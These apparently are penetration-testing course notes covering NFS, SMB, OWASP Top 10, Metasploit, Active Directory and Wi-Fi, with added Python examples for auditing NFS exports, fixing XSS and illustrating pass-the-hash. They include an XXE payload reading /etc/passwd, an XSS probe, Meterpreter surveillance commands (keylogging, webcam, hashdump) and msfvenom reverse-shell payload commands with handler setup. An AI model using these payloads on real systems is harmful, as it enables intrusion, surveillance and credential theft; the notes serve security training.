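The NFS misconfigurations that make the step above possible, as an added check that is not part of the course notes: it parses an /etc/exports file (the constructed one below) and flags world exports, no_root_squash and insecure. The same conditions are what you look for in the output of showmount on the attacking side.

```python
"""Added example (not part of the course notes): audit an /etc/exports file for
the options that make NFS shares dangerous. The exports file is constructed."""
import re

SAMPLE_EXPORTS = """# /etc/exports (constructed for the demo)
/home/alice      *(rw,sync,no_root_squash,no_subtree_check)
/srv/backups     10.0.0.0/24(ro,sync,root_squash)
/var/nfs/general 10.0.0.10(rw,insecure,no_root_squash) 10.0.0.11(ro)
"""

CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)")   # client(option,option,...)

FINDINGS = {
    "WORLD": "exported to every host (*)",
    "WORLD_RW": "writable by every host",
    "NO_ROOT_SQUASH": "no_root_squash: root on any client is root on the share",
    "INSECURE": "insecure: requests from unprivileged source ports are accepted",
}

def parse_exports(text: str) -> list:
    """[(path, [(client, {options}), ...]), ...] ignoring comments and blank lines."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        clients = [(c, set(filter(None, o.split(",")))) for c, o in CLIENT_RE.findall(rest)]
        exports.append((path, clients))
    return exports

def audit_exports(text: str) -> list:
    """[(path, client, finding_code), ...] for every risky export option."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            if client == "*":
                findings.append((path, client, "WORLD"))
                if "rw" in opts:
                    findings.append((path, client, "WORLD_RW"))
            if "no_root_squash" in opts:
                findings.append((path, client, "NO_ROOT_SQUASH"))
            if "insecure" in opts:
                findings.append((path, client, "INSECURE"))
    return findings

if __name__ == "__main__":
    for path, client, code in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {FINDINGS[code]}")
```

A home directory exported with rw and no_root_squash is exactly the combination the exploit step relies on: you mount it as root, write authorized_keys as the owner, and the server accepts it.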
SMB:
Enumeration SMB:
Using enum4linux -a IP
Exploit SMB:
Download the SSH private key id_rsa from the share and use it with ssh -i to log in.
Chapter 12
OWASP Top 10
1- Command Injection:
2- Broken Authentication:
3- Sensitive Data Exposure:
4- XML External Entity (XXE):
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
This payload declares an external entity that points at a local file and then references it, so a parser that resolves external entities substitutes the contents of /etc/passwd wherever &read; appears in the output. The fix is to disable DTD processing and external entity resolution in the parser, not to filter the input.
6- Security Misconfiguration:
7- Cross-site Scripting (XSS):
1. Reflected XSS
2. Stored XSS
3. DOM Based XSS
<script>alert('xss-wolfkissed');</script>
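The same reflected output written the vulnerable way and the fixed way, as an added example that is not part of the course notes. The inputs are constructed; the test payload is the one above. The point to take away is that the encoding must match the output context: html.escape with quote=True is right for text and quoted attributes, while URL or JavaScript contexts need their own encoding.

```python
"""Added example (not part of the course notes): a reflected-XSS sink beside its
hardened form. Inputs are constructed; PAYLOAD is the probe from the notes."""
import html

PAYLOAD = "<script>alert('xss-wolfkissed');</script>"

def render_unsafe(name: str) -> str:
    """Vulnerable: user input concatenated straight into HTML (reflected XSS)."""
    return f"<p>Hello, {name}!</p>"

def render_safe(name: str) -> str:
    """Fixed for a text context: the browser shows the payload as literal text."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"

def render_attr_safe(value: str) -> str:
    """Attribute context: quote=True also encodes " and ' so the attribute
    cannot be closed early to inject an event handler."""
    return f'<input value="{html.escape(value, quote=True)}">'

def contains_script_tag(markup: str) -> bool:
    """Crude check used only to show the difference: did a real <script> tag survive?"""
    return "<script" in markup.lower()

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_attr_safe('" onfocus="alert(1)'))
```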
Chapter 13
Web Hacking
Walking An Application:
1- Viewing The Page Source
2- Developer Tools - Inspector
3- Developer Tools - Debugger
4- Developer Tools – Network
Content Discovery:
1- Manual Discovery - Robots.txt
2- Manual Discovery - Sitemap.xml
3- Manual Discovery - HTTP Headers
4- Manual Discovery - Framework Stack
5- OSINT - Google Hacking / Dorking
6- OSINT - Wappalyzer
7- OSINT - Wayback Machine
8- OSINT – GitHub
9- Automation - Fuzzing
Subdomain Enumeration:
1. Sublist3r
2. Assetfinder
3. subEnum
4. Google Dorking
5. Vhost Fuzzing
Web Vulnerabilities
1. IDOR
2. SQL Injection
3. Command Injection
4. SSRF
5. Cross-Site Scripting
6. Authentication Bypass
7. File Upload
Chapter 14
Metasploit
Metasploit:
Metasploit is the most widely used exploitation framework. It is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.
Metasploit Commands:
Metasploit Meterpreter:
msfvenom --list payloads shows all available payloads.
Meterpreter commands
Core commands will be helpful to navigate and interact with the target system. Below
are some of the most commonly used. Remember to check all available commands
running the help command once a Meterpreter session has started.
Commands:
background: Backgrounds the current session
exit: Terminate the Meterpreter session
guid: Get the session GUID (Globally Unique Identifier)
help: Displays the help menu
info: Displays information about a Post module
irb: Opens an interactive Ruby shell on the current session
load: Loads one or more Meterpreter extensions
migrate: Allows you to migrate Meterpreter to another process
run: Executes a Meterpreter script or Post module
sessions: Quickly switch to another session
Networking commands
arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table
System commands
Other Command:
idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database
Msfvenom:
msfvenom -l payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php
Other Payloads:
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
After that, start Metasploit (msfconsole), run use exploit/multi/handler, set PAYLOAD to the same payload you gave msfvenom, set LHOST and LPORT to the same values, and then exploit (or run). The handler must be listening before the payload is executed on the target, otherwise the connect-back fails.
Chapter 15
Active Directory
A Windows domain is a group of users and computers under the administration of a single organisation. It centralises the administration of the common components of a Windows computer network in a single repository called Active Directory (AD). The server that runs the Active Directory services is known as a Domain Controller (DC).
Users: the people (and service accounts) that log on to the domain.
Machines: every computer joined to the domain also gets an account, named after the host with a trailing $ (for example PC$), which AD treats like any other user.
Security groups:
Domain Admins: Users of this group have administrative privileges over the entire domain. By default, they can administer any computer on the domain, including the DCs.
Server Operators: Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.
Backup Operators: Users in this group are allowed to access any file, ignoring their permissions. They are used to perform backups of data on computers.
Account Operators: Users in this group can create or modify other accounts in the domain.
Domain Computers: Includes all existing computers in the domain.
Domain Controllers: Includes all existing DCs on the domain.
When using Windows domains, all credentials are stored in the Domain Controllers. Whenever a user tries to authenticate to a service using domain credentials, the service will need to ask the Domain Controller to verify that they are correct. Two protocols can be used for network authentication in Windows domains:
Kerberos: Used by any recent version of Windows. This is the default protocol in any recent domain.
NetNTLM: Legacy authentication protocol kept for compatibility purposes.
Kerberos Authentication: Kerberos is the default authentication protocol for any recent version of Windows. The client obtains a ticket from the DC and presents it to the service, so the service never handles the user's password.
NetNTLM Authentication: NetNTLM works using a challenge-response mechanism. The service sends the client a random challenge, the client answers with a value computed from the challenge and the user's password hash, and the service forwards both to the DC, which recomputes the answer from the stored hash and compares. The password itself never crosses the wire, but the hash alone is enough to answer a challenge, which is what makes pass-the-hash possible.
Active Directory Attack
Enumeration:
Now enumerate the domain users.
Exploit:
This allows us to retrieve all of the password hashes.
Now we use evil-winrm to pass the hash.
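The challenge-response exchange from the NetNTLM description, and the two attacks the exploit section above relies on (pass-the-hash and offline cracking of a captured exchange), as an added schematic that is not part of the course notes. Real NetNTLMv2 keys an HMAC-MD5 on the NT hash (MD4 of the UTF-16LE password); this example uses HMAC-SHA256 keyed on a SHA-256 of the password so it runs with the standard library alone, and the account, password and wordlist are constructed.

```python
"""Added example (not part of the course notes): a schematic of NetNTLM-style
challenge-response authentication and why it is attackable. Real NetNTLMv2 uses
HMAC-MD5 keyed on the NT hash (MD4 of the UTF-16LE password); SHA-256 stands in
here so the code needs only the standard library. All accounts are constructed."""
import hashlib
import hmac
import os

def password_hash(password: str) -> bytes:
    """Stand-in for the NT hash: stored on the DC, never sent on the wire."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()

def compute_response(pw_hash: bytes, challenge: bytes) -> bytes:
    """The client proves it knows the hash without sending it."""
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()

# Constructed account database (the DC's view): username -> stored hash
USERS = {"alice": password_hash("Winter2024!")}

def server_auth(username: str, respond) -> bool:
    """Service/DC side: issue a random challenge, verify the client's answer."""
    challenge = os.urandom(8)
    response = respond(challenge)
    stored = USERS.get(username)
    if stored is None:
        return False
    return hmac.compare_digest(response, compute_response(stored, challenge))

def client(password: str):
    """Normal client: derives the hash from the password, answers challenges."""
    pw_hash = password_hash(password)
    return lambda challenge: compute_response(pw_hash, challenge)

def client_from_hash(pw_hash: bytes):
    """Pass-the-hash: a stolen hash is enough to answer challenges; no password needed."""
    return lambda challenge: compute_response(pw_hash, challenge)

def offline_crack(challenge: bytes, response: bytes, wordlist):
    """An attacker who sniffed one (challenge, response) pair tries candidates offline."""
    for word in wordlist:
        if hmac.compare_digest(compute_response(password_hash(word), challenge), response):
            return word
    return None

if __name__ == "__main__":
    print(server_auth("alice", client("Winter2024!")))          # True
    print(server_auth("alice", client_from_hash(USERS["alice"])))  # True: pass-the-hash
    ch = os.urandom(8)
    print(offline_crack(ch, client("Winter2024!")(ch), ["password", "Winter2024!"]))
```

The same structure explains the real tools: a dumped NT hash feeds evil-winrm or psexec directly, and a NetNTLMv2 exchange captured with Responder is a hashcat job, because the server's random challenge is sent in the clear.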
Chapter 16
Wi-Fi Hacking
Change the wireless interface from managed mode to monitor mode, so that it captures every frame on the channel rather than only frames addressed to it.
Find and capture the WPA 4-way handshake between a client and the access point; the handshake is what the offline password-cracking attack needs.
Chapter 17
Capture The Flag (CTF)
Basic Pentesting
Mr Robot
Blue
Juice Shop